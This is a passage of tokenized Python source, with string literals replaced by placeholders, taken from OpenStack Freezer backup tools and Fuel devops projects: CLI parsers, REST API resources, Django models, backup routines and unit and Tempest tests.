, <EOL> help = '<STR_LIT>' ) <EOL> unregister_audit_parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT:name>' , action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' ) <EOL> unregister_audit_parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' ) <EOL> unregister_audit_parser . set_defaults ( func = unregister_audit ) <EOL> register_repair_parser = subparsers . add_parser ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> register_repair_parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT:name>' , action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' ) <EOL> register_repair_parser . add_argument ( '<STR_LIT:-c>' , dest = '<STR_LIT>' , action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' ) <EOL> register_repair_parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' ) <EOL> register_repair_parser . set_defaults ( func = register_repair ) <EOL> unregister_repair_parser = subparsers . add_parser ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> unregister_repair_parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT:name>' , action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' ) <EOL> unregister_repair_parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' ) <EOL> unregister_repair_parser . set_defaults ( func = unregister_repair ) <EOL> start_engine_parser = subparsers . add_parser ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> start_engine_parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT:name>' , help = '<STR_LIT:Name>' ) <EOL> start_engine_parser . add_argument ( '<STR_LIT:-c>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> start_engine_parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' ) <EOL> start_engine_parser . set_defaults ( func = start_engine ) <EOL> stop_engine_parser = subparsers . add_parser ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> stop_engine_parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT:name>' , <EOL> help = "<STR_LIT>" ) <EOL> stop_engine_parser . set_defaults ( func = stop_engine ) <EOL> args = parser . parse_args ( ) <EOL> args . func ( args ) <EOL> def main ( ) : <EOL> console_format = '<STR_LIT>' <EOL> logging . basicConfig ( format = console_format , <EOL> level = logging . INFO ) <EOL> parse ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> import falcon <EOL> from freezer_api . api . common import resource <EOL> from freezer_api . common import exceptions as freezer_api_exc <EOL> class ActionsCollectionResource ( resource . BaseResource ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , storage_driver ) : <EOL> self . db = storage_driver <EOL> def on_get ( self , req , resp ) : <EOL> user_id = req . get_header ( '<STR_LIT>' ) <EOL> offset = req . get_param_as_int ( '<STR_LIT>' ) or <NUM_LIT:0> <EOL> limit = req . get_param_as_int ( '<STR_LIT>' ) or <NUM_LIT:10> <EOL> search = self . json_body ( req ) <EOL> obj_list = self . db . search_action ( user_id = user_id , offset = offset , <EOL> limit = limit , search = search ) <EOL> resp . body = { '<STR_LIT>' : obj_list } <EOL> def on_post ( self , req , resp ) : <EOL> doc = self . json_body ( req ) <EOL> if not doc : <EOL> raise freezer_api_exc . BadDataFormat ( <EOL> message = '<STR_LIT>' ) <EOL> user_id = req . get_header ( '<STR_LIT>' ) <EOL> action_id = self . db . add_action ( user_id = user_id , doc = doc ) <EOL> resp . status = falcon . HTTP_201 <EOL> resp . body = { '<STR_LIT>' : action_id } <EOL> class ActionsResource ( resource . BaseResource ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , storage_driver ) : <EOL> self . db = storage_driver <EOL> def on_get ( self , req , resp , action_id ) : <EOL> user_id = req . get_header ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> obj = self . db . get_action ( user_id = user_id , action_id = action_id ) <EOL> if obj : <EOL> resp . body = obj <EOL> else : <EOL> resp . status = falcon . HTTP_404 <EOL> def on_delete ( self , req , resp , action_id ) : <EOL> user_id = req . get_header ( '<STR_LIT>' ) <EOL> self . db . delete_action ( user_id = user_id , action_id = action_id ) <EOL> resp . body = { '<STR_LIT>' : action_id } <EOL> resp . status = falcon . HTTP_204 <EOL> def on_patch ( self , req , resp , action_id ) : <EOL> user_id = req . get_header ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> doc = self . json_body ( req ) <EOL> new_version = self . db . update_action ( user_id = user_id , <EOL> action_id = action_id , <EOL> patch_doc = doc ) <EOL> resp . body = { '<STR_LIT>' : action_id , '<STR_LIT:version>' : new_version } <EOL> def on_post ( self , req , resp , action_id ) : <EOL> user_id = req . get_header ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> doc = self . json_body ( req ) <EOL> new_version = self . db . replace_action ( user_id = user_id , <EOL> action_id = action_id , <EOL> doc = doc ) <EOL> resp . status = falcon . HTTP_201 <EOL> resp . body = { '<STR_LIT>' : action_id , '<STR_LIT:version>' : new_version } </s>
<s> import json <EOL> from freezer_api . tests . freezer_api_tempest_plugin . tests . api import base <EOL> from tempest import test <EOL> class TestFreezerApiSessions ( base . BaseFreezerApiTest ) : <EOL> @ classmethod <EOL> def resource_setup ( cls ) : <EOL> super ( TestFreezerApiSessions , cls ) . resource_setup ( ) <EOL> @ classmethod <EOL> def resource_cleanup ( cls ) : <EOL> super ( TestFreezerApiSessions , cls ) . resource_cleanup ( ) <EOL> @ test . attr ( type = "<STR_LIT>" ) <EOL> def test_api_sessions ( self ) : <EOL> resp , response_body = self . freezer_api_client . get_sessions ( ) <EOL> self . assertEqual ( <NUM_LIT:200> , resp . status ) <EOL> response_body_json = json . loads ( response_body ) <EOL> self . assertIn ( '<STR_LIT>' , response_body_json ) <EOL> sessions = response_body_json [ '<STR_LIT>' ] <EOL> self . assertEqual ( [ ] , sessions ) <EOL> @ test . attr ( type = "<STR_LIT>" ) <EOL> def test_api_sessions_post ( self ) : <EOL> session = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT:description>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:5> , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT:status>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } , <EOL> "<STR_LIT>" : [ <EOL> { '<STR_LIT>' : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:status>" : "<STR_LIT>" , <EOL> "<STR_LIT:result>" : "<STR_LIT:success>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> <EOL> } , <EOL> '<STR_LIT>' : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:status>" : "<STR_LIT>" , <EOL> "<STR_LIT:result>" : "<STR_LIT:success>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> <EOL> } <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT:status>" : "<STR_LIT>" , <EOL> "<STR_LIT:result>" : "<STR_LIT:success>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> resp , response_body = self . freezer_api_client . post_sessions ( session ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status ) <EOL> self . assertIn ( '<STR_LIT>' , response_body ) <EOL> session_id = response_body [ '<STR_LIT>' ] <EOL> resp , response_body = self . freezer_api_client . get_sessions ( session_id ) <EOL> self . assertEqual ( <NUM_LIT:200> , resp . status ) <EOL> resp , response_body = self . freezer_api_client . delete_sessions ( <EOL> session_id ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status ) </s>
<s> from django . conf . urls import patterns <EOL> from django . conf . urls import url <EOL> from disaster_recovery . backups import views <EOL> urlpatterns = patterns ( <EOL> '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , views . IndexView . as_view ( ) , name = '<STR_LIT:index>' ) , <EOL> url ( r'<STR_LIT>' , views . DetailView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . RestoreView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> ) </s>
<s> import sys <EOL> import os <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import time <EOL> from oslo_config import cfg <EOL> from oslo_log import log <EOL> from freezer . utils import utils <EOL> CONF = cfg . CONF <EOL> logging = log . getLogger ( __name__ ) <EOL> home = os . path . expanduser ( "<STR_LIT>" ) <EOL> class BackupOs : <EOL> def __init__ ( self , client_manager , container , storage ) : <EOL> """<STR_LIT>""" <EOL> self . client_manager = client_manager <EOL> self . container = container <EOL> self . storage = storage <EOL> def backup_nova ( self , instance_id ) : <EOL> """<STR_LIT>""" <EOL> instance_id = instance_id <EOL> client_manager = self . client_manager <EOL> nova = client_manager . get_nova ( ) <EOL> instance = nova . servers . get ( instance_id ) <EOL> glance = client_manager . get_glance ( ) <EOL> if instance . __dict__ [ '<STR_LIT>' ] : <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> instance = nova . servers . get ( instance ) <EOL> image_id = nova . servers . create_image ( instance , <EOL> "<STR_LIT>" % instance_id ) <EOL> image = glance . images . get ( image_id ) <EOL> while image . status != '<STR_LIT>' : <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> try : <EOL> image = glance . images . get ( image_id ) <EOL> except Exception as e : <EOL> logging . error ( e ) <EOL> stream = client_manager . download_image ( image ) <EOL> package = "<STR_LIT>" . format ( instance_id , utils . DateTime . now ( ) . timestamp ) <EOL> logging . info ( "<STR_LIT>" ) <EOL> headers = { "<STR_LIT>" : instance . _info [ '<STR_LIT:name>' ] , <EOL> "<STR_LIT>" : instance . _info [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] } <EOL> self . storage . add_stream ( stream , package , headers ) <EOL> logging . info ( "<STR_LIT>" ) <EOL> glance . images . delete ( image ) <EOL> def backup_cinder_by_glance ( self , volume_id ) : <EOL> """<STR_LIT>""" <EOL> client_manager = self . client_manager <EOL> cinder = client_manager . get_cinder ( ) <EOL> volume = cinder . volumes . get ( volume_id ) <EOL> logging . debug ( "<STR_LIT>" ) <EOL> snapshot = client_manager . provide_snapshot ( <EOL> volume , "<STR_LIT>" % volume_id ) <EOL> logging . debug ( "<STR_LIT>" ) <EOL> copied_volume = client_manager . do_copy_volume ( snapshot ) <EOL> logging . debug ( "<STR_LIT>" ) <EOL> image = client_manager . make_glance_image ( "<STR_LIT:name>" , copied_volume ) <EOL> logging . debug ( "<STR_LIT>" . format ( image . id ) ) <EOL> stream = client_manager . download_image ( image ) <EOL> package = "<STR_LIT>" . format ( volume_id , utils . DateTime . now ( ) . timestamp ) <EOL> logging . debug ( "<STR_LIT>" ) <EOL> headers = { } <EOL> self . storage . add_stream ( stream , package , headers = headers ) <EOL> logging . debug ( "<STR_LIT>" ) <EOL> client_manager . clean_snapshot ( snapshot ) <EOL> logging . debug ( "<STR_LIT>" ) <EOL> cinder . volumes . delete ( copied_volume ) <EOL> logging . debug ( "<STR_LIT>" ) <EOL> client_manager . get_glance ( ) . images . delete ( image . id ) <EOL> def backup_cinder ( self , volume_id , name = None , description = None ) : <EOL> client_manager = self . client_manager <EOL> cinder = client_manager . get_cinder ( ) <EOL> search_opts = { <EOL> '<STR_LIT>' : volume_id , <EOL> '<STR_LIT:status>' : '<STR_LIT>' , <EOL> } <EOL> backups = cinder . backups . list ( search_opts = search_opts ) <EOL> if len ( backups ) > <NUM_LIT:0> : <EOL> incremental = True <EOL> else : <EOL> incremental = False <EOL> container = "<STR_LIT>" . format ( self . container , volume_id , <EOL> utils . DateTime . now ( ) . timestamp ) <EOL> cinder . backups . create ( volume_id , container , name , description , <EOL> incremental = incremental , force = True ) </s>
<s> import subprocess <EOL> from freezer . tests . freezer_tempest_plugin . tests . api import base <EOL> from freezer import __version__ as FREEZER_VERSION <EOL> from tempest import test <EOL> class TestFreezerVersion ( base . BaseFreezerTest ) : <EOL> @ test . attr ( type = "<STR_LIT>" ) <EOL> def test_version ( self ) : <EOL> version = subprocess . check_output ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> stderr = subprocess . STDOUT ) <EOL> self . assertEqual ( FREEZER_VERSION , version . strip ( ) ) </s>
<s> import unittest <EOL> from freezer . openstack import openstack <EOL> from freezer . openstack import osclients <EOL> from freezer . storage import swift <EOL> from freezer . storage import base <EOL> class TestSwiftStorage ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . storage = swift . SwiftStorage ( <EOL> osclients . ClientManager ( <EOL> openstack . OpenstackOptions . create_from_env ( ) <EOL> ) , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> <NUM_LIT:100> , skip_prepare = True <EOL> ) <EOL> self . files = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> self . increments = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> self . cycles_increments = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> self . backup = base . Backup ( self . storage , <EOL> "<STR_LIT>" , <NUM_LIT:1000> , tar_meta = True , ) <EOL> self . backup_2 = base . Backup ( self . storage , <EOL> "<STR_LIT>" , <NUM_LIT> , tar_meta = True ) <EOL> self . increment = base . Backup ( self . storage , <EOL> "<STR_LIT>" , <NUM_LIT> , <EOL> full_backup = self . backup , <EOL> level = <NUM_LIT:1> , <EOL> tar_meta = True ) <EOL> self . increment_2 = base . Backup ( self . storage , <EOL> "<STR_LIT>" , <NUM_LIT> , <EOL> full_backup = self . backup_2 , <EOL> level = <NUM_LIT:1> , <EOL> tar_meta = True ) <EOL> def test__get_backups ( self ) : <EOL> backups = base . Backup . parse_backups ( self . files , self . storage ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( backups ) ) <EOL> backup = backups [ <NUM_LIT:0> ] <EOL> self . assertEqual ( self . backup , backup ) <EOL> def test__get_backups_with_tar_only ( self ) : <EOL> backups = base . Backup . parse_backups ( <EOL> [ "<STR_LIT>" ] , self . storage ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( backups ) ) <EOL> def test__get_backups_without_tar ( self ) : <EOL> backups = base . Backup . parse_backups ( [ "<STR_LIT>" ] , <EOL> self . storage ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( backups ) ) <EOL> self . backup . tar_meta = False <EOL> backup = backups [ <NUM_LIT:0> ] <EOL> self . assertEqual ( self . backup , backup ) <EOL> def test__get_backups_increment ( self ) : <EOL> backups = base . Backup . parse_backups ( self . increments , self . storage ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( backups ) ) <EOL> self . backup . add_increment ( self . increment ) <EOL> backup = backups [ <NUM_LIT:0> ] <EOL> self . assertEqual ( self . backup , backup ) <EOL> def test__get_backups_increments ( self ) : <EOL> backups = base . Backup . parse_backups ( self . cycles_increments , <EOL> self . storage ) <EOL> self . assertEqual ( <NUM_LIT:2> , len ( backups ) ) <EOL> self . backup . add_increment ( self . increment ) <EOL> self . backup_2 . add_increment ( self . increment_2 ) <EOL> self . assertEqual ( self . backup , backups [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( self . backup_2 , backups [ <NUM_LIT:1> ] ) </s>
<s> from fabric import api as fabric_api <EOL> from fuel_dev_tools import cmd_parser <EOL> class SlavesMixin ( cmd_parser . CmdParserMixin ) : <EOL> def discover_slaves ( self ) : <EOL> slaves = self . ssh_command ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return self . parse_output ( slaves ) <EOL> def rsync_slave ( self , slave , source , target ) : <EOL> self . print_debug ( '<STR_LIT>' . format ( ** slave ) ) <EOL> target = '<STR_LIT>' . format ( target ) <EOL> hop_args = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( <EOL> self . app_args . ip , <EOL> self . app_args . port , <EOL> slave [ '<STR_LIT>' ] <EOL> ) <EOL> ] <EOL> self . rsync ( source , target , * hop_args ) <EOL> def slave_command ( self , slave , * cmd ) : <EOL> cmd = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( self . app_args . user , self . app_args . ip ) , <EOL> '<STR_LIT>' , self . app_args . port , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( ** slave ) <EOL> ] + list ( cmd ) <EOL> return fabric_api . run ( '<STR_LIT:U+0020>' . join ( cmd ) ) </s>
<s> import abc <EOL> from datetime import datetime <EOL> from functools import reduce <EOL> import operator <EOL> from django . db import models <EOL> from django . db . models . base import ModelBase <EOL> from django . db . models import query <EOL> import jsonfield <EOL> import six <EOL> from devops . error import DevopsError <EOL> from devops . helpers . helpers import deepgetattr <EOL> from devops . helpers import loader <EOL> def choices ( * args , ** kwargs ) : <EOL> defaults = { '<STR_LIT:max_length>' : <NUM_LIT:255> , '<STR_LIT:null>' : False } <EOL> defaults . update ( kwargs ) <EOL> defaults . update ( choices = list ( zip ( args , args ) ) ) <EOL> return models . CharField ( ** defaults ) <EOL> class BaseModel ( models . Model ) : <EOL> class Meta ( object ) : <EOL> abstract = True <EOL> created = models . DateTimeField ( default = datetime . utcnow ) <EOL> class ParamedModelType ( ModelBase ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , name , bases , attrs ) : <EOL> super_new = super ( ParamedModelType , cls ) . __new__ <EOL> if name != '<STR_LIT>' and name != '<STR_LIT>' : <EOL> parents = reduce ( operator . add , map ( lambda a : a . __mro__ , bases ) ) <EOL> if ParamedModel not in bases and ParamedModel in parents : <EOL> if '<STR_LIT:Meta>' not in attrs : <EOL> attrs [ '<STR_LIT:Meta>' ] = type ( '<STR_LIT:Meta>' , ( object , ) , { } ) <EOL> Meta = attrs [ '<STR_LIT:Meta>' ] <EOL> Meta . proxy = True <EOL> new_class = super_new ( cls , name , bases , attrs ) <EOL> new_class . _param_field_names = [ ] <EOL> for attr_name in attrs : <EOL> attr = attrs [ attr_name ] <EOL> if isinstance ( attr , ParamFieldBase ) : <EOL> attr . set_param_key ( attr_name ) <EOL> new_class . _param_field_names . append ( attr_name ) <EOL> return new_class <EOL> def __call__ ( cls , * args , ** kwargs ) : <EOL> kwargs_for_params = { } <EOL> defined_params = cls . get_defined_params ( ) <EOL> for param in defined_params : <EOL> if param in kwargs : <EOL> kwargs_for_params [ param ] = kwargs . pop ( param ) <EOL> obj = super ( ParamedModelType , cls ) . __call__ ( * args , ** kwargs ) <EOL> if obj . _class : <EOL> Cls = loader . load_class ( obj . _class ) <EOL> obj . __class__ = Cls <EOL> for param in kwargs_for_params : <EOL> setattr ( obj , param , kwargs_for_params [ param ] ) <EOL> return obj <EOL> @ six . add_metaclass ( abc . ABCMeta ) <EOL> class ParamFieldBase ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . param_key = None <EOL> def set_param_key ( self , param_key ) : <EOL> self . param_key = param_key <EOL> @ abc . abstractmethod <EOL> def set_default_value ( self , instance ) : <EOL> return <EOL> @ abc . abstractmethod <EOL> def __get__ ( self , instance , cls ) : <EOL> return <EOL> @ abc . abstractmethod <EOL> def __set__ ( self , instance , values ) : <EOL> return <EOL> def __delete__ ( self , instance ) : <EOL> raise AttributeError ( "<STR_LIT>" ) <EOL> class ParamField ( ParamFieldBase ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , default = None , choices = None ) : <EOL> super ( ParamField , self ) . __init__ ( ) <EOL> if choices and default not in choices : <EOL> raise DevopsError ( '<STR_LIT>' ) <EOL> self . default_value = default <EOL> self . choices = choices <EOL> def set_default_value ( self , instance ) : <EOL> instance . params . setdefault ( self . param_key , self . default_value ) <EOL> def __get__ ( self , instance , cls ) : <EOL> return instance . params . get ( self . param_key , self . default_value ) <EOL> def __set__ ( self , instance , value ) : <EOL> if self . choices and value not in self . choices : <EOL> raise DevopsError ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( self . param_key ) ) <EOL> instance . params [ self . param_key ] = value <EOL> class ParamMultiField ( ParamFieldBase ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** subfields ) : <EOL> super ( ParamMultiField , self ) . __init__ ( ) <EOL> if len ( subfields ) == <NUM_LIT:0> : <EOL> raise DevopsError ( '<STR_LIT>' ) <EOL> self . subfields = [ ] <EOL> for name , field in subfields . items ( ) : <EOL> if not isinstance ( field , ( ParamField , ParamMultiField ) ) : <EOL> raise DevopsError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( name ) ) <EOL> field . set_param_key ( name ) <EOL> self . subfields . append ( field ) <EOL> self . choices = None <EOL> self . _proxy = None <EOL> self . proxy_fields = { field . param_key : field <EOL> for field in self . subfields } <EOL> Proxy = type ( '<STR_LIT>' , ( object , ) , self . proxy_fields ) <EOL> self . _proxy = Proxy ( ) <EOL> def set_default_value ( self , instance ) : <EOL> for field in self . subfields : <EOL> self . _init_proxy_params ( instance ) <EOL> field . set_default_value ( self . _proxy ) <EOL> def _init_proxy_params ( self , instance ) : <EOL> instance . params . setdefault ( self . param_key , dict ( ) ) <EOL> self . _proxy . params = instance . params [ self . param_key ] <EOL> def __get__ ( self , instance , cls ) : <EOL> self . _init_proxy_params ( instance ) <EOL> return self . _proxy <EOL> def __set__ ( self , instance , values ) : <EOL> if not isinstance ( values , dict ) : <EOL> raise DevopsError ( '<STR_LIT>' ) <EOL> self . _init_proxy_params ( instance ) <EOL> for field_name , field_value in values . items ( ) : <EOL> if field_name not in self . proxy_fields : <EOL> raise DevopsError ( '<STR_LIT>' . format ( field_name ) ) <EOL> setattr ( self . _proxy , field_name , field_value ) <EOL> class ParamedModelQuerySet ( query . QuerySet ) : <EOL> """<STR_LIT>""" <EOL> def __get_all_field_names ( self ) : <EOL> field_names = set ( ) <EOL> _meta = self . model . _meta <EOL> fields = _meta . get_fields ( ) <EOL> for field in fields : <EOL> if field . is_relation and field . many_to_one and field . related_model is None : <EOL> continue <EOL> if field . model != _meta . model and field . model . _meta . concrete_model == _meta . concrete_model : <EOL> continue <EOL> field_names . add ( field . name ) <EOL> if hasattr ( field , '<STR_LIT>' ) : <EOL> field_names . add ( field . attname ) <EOL> return field_names <EOL> def filter ( self , * args , ** kwargs ) : <EOL> super_filter = super ( ParamedModelQuerySet , self ) . filter <EOL> kwargs_for_params = { } <EOL> db_kwargs = { } <EOL> field_names = self . __get_all_field_names ( ) <EOL> for param in kwargs . keys ( ) : <EOL> first_subparam = param . split ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> if first_subparam not in field_names : <EOL> kwargs_for_params [ param ] = kwargs [ param ] <EOL> else : <EOL> db_kwargs [ param ] = kwargs [ param ] <EOL> queryset = super_filter ( * args , ** db_kwargs ) <EOL> if not kwargs_for_params : <EOL> return queryset <EOL> result_ids = [ ] <EOL> for item in queryset : <EOL> for key , value in kwargs_for_params . items ( ) : <EOL> item_val = deepgetattr ( item , key , splitter = '<STR_LIT>' , <EOL> do_raise = True ) <EOL> if item_val != value : <EOL> break <EOL> else : <EOL> result_ids . append ( item . id ) <EOL> return super_filter ( id__in = result_ids ) <EOL> class ParamedModelManager ( models . Manager ) : <EOL> """<STR_LIT>""" <EOL> use_for_related_fields = True <EOL> def get_queryset ( self ) : <EOL> return ParamedModelQuerySet ( self . model , using = self . _db ) <EOL> class ParamedModel ( six . with_metaclass ( ParamedModelType , models . Model ) ) : <EOL> """<STR_LIT>""" <EOL> class Meta ( object ) : <EOL> abstract = True <EOL> objects = ParamedModelManager ( ) <EOL> params = jsonfield . JSONField ( default = { } ) <EOL> _class = ParamField ( ) <EOL> @ classmethod <EOL> def get_defined_params ( cls ) : <EOL> param_names = [ ] <EOL> for basecls in cls . __mro__ : <EOL> if not hasattr ( basecls , '<STR_LIT>' ) : <EOL> continue <EOL> param_names += basecls . _param_field_names <EOL> return param_names <EOL> def set_default_params ( self ) : <EOL> for basecls in self . __class__ . __mro__ : <EOL> if not hasattr ( basecls , '<STR_LIT>' ) : <EOL> continue <EOL> for param in basecls . _param_field_names : <EOL> basecls . __dict__ [ param ] . set_default_value ( self ) <EOL> def save ( self , * args , ** kwargs ) : <EOL> self . _class = loader . get_class_path ( self ) <EOL> self . set_default_params ( ) <EOL> return super ( ParamedModel , self ) . save ( * args , ** kwargs ) </s>
<s> import collections <EOL> import os <EOL> import mock <EOL> from netaddr import IPAddress <EOL> import yaml <EOL> from devops . models import AddressPool <EOL> from devops . models import Environment <EOL> from devops . tests . driver . libvirt . base import LibvirtTestCase <EOL> ENV_TMPLT = """<STR_LIT>""" <EOL> class TestLibvirtTemplate ( LibvirtTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestLibvirtTemplate , self ) . setUp ( ) <EOL> self . sleep_mock = self . patch ( '<STR_LIT>' ) <EOL> self . open_mock = mock . mock_open ( read_data = '<STR_LIT>' ) <EOL> self . patch ( '<STR_LIT>' , <EOL> self . open_mock , create = True ) <EOL> self . os_mock = self . patch ( '<STR_LIT>' ) <EOL> self . os_mock . urandom = os . urandom <EOL> Size = collections . namedtuple ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> self . file_sizes = { <EOL> '<STR_LIT>' : Size ( st_size = <NUM_LIT> ) , <EOL> } <EOL> self . os_mock . stat . side_effect = self . file_sizes . get <EOL> self . full_conf = yaml . load ( ENV_TMPLT ) <EOL> self . env = Environment . create_environment ( self . full_conf ) <EOL> self . d = self . env . get_group ( name = '<STR_LIT>' ) . driver <EOL> def test_ips ( self ) : <EOL> admin_net = AddressPool . objects . get ( <EOL> name = '<STR_LIT>' ) . ip_network <EOL> pub_net = AddressPool . objects . get ( <EOL> name = '<STR_LIT>' ) . ip_network <EOL> stor_net = AddressPool . objects . get ( <EOL> name = '<STR_LIT>' ) . ip_network <EOL> mng_net = AddressPool . objects . get ( <EOL> name = '<STR_LIT>' ) . ip_network <EOL> priv_net = AddressPool . objects . get ( <EOL> name = '<STR_LIT>' ) . ip_network <EOL> def assert_ip_in_net ( ip , net ) : <EOL> assert IPAddress ( ip ) in net <EOL> admin_node = self . env . get_node ( name = '<STR_LIT>' ) <EOL> adm_eth0 = admin_node . interface_set . get ( label = '<STR_LIT>' ) <EOL> assert len ( adm_eth0 . addresses ) == <NUM_LIT:1> <EOL> assert_ip_in_net ( adm_eth0 . addresses [ <NUM_LIT:0> ] . ip_address , admin_net ) <EOL> for node_name in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> slave_node = self . env . get_node ( name = node_name ) <EOL> slave_eth0 = slave_node . interface_set . get ( label = '<STR_LIT>' ) <EOL> assert len ( slave_eth0 . addresses ) == <NUM_LIT:1> <EOL> assert_ip_in_net ( slave_eth0 . addresses [ <NUM_LIT:0> ] . ip_address , admin_net ) <EOL> slave_eth2 = slave_node . interface_set . get ( label = '<STR_LIT>' ) <EOL> assert len ( slave_eth2 . addresses ) == <NUM_LIT:1> <EOL> assert_ip_in_net ( slave_eth2 . addresses [ <NUM_LIT:0> ] . ip_address , pub_net ) <EOL> slave_eth2 = slave_node . interface_set . get ( label = '<STR_LIT>' ) <EOL> assert len ( slave_eth2 . addresses ) == <NUM_LIT:1> <EOL> assert_ip_in_net ( slave_eth2 . addresses [ 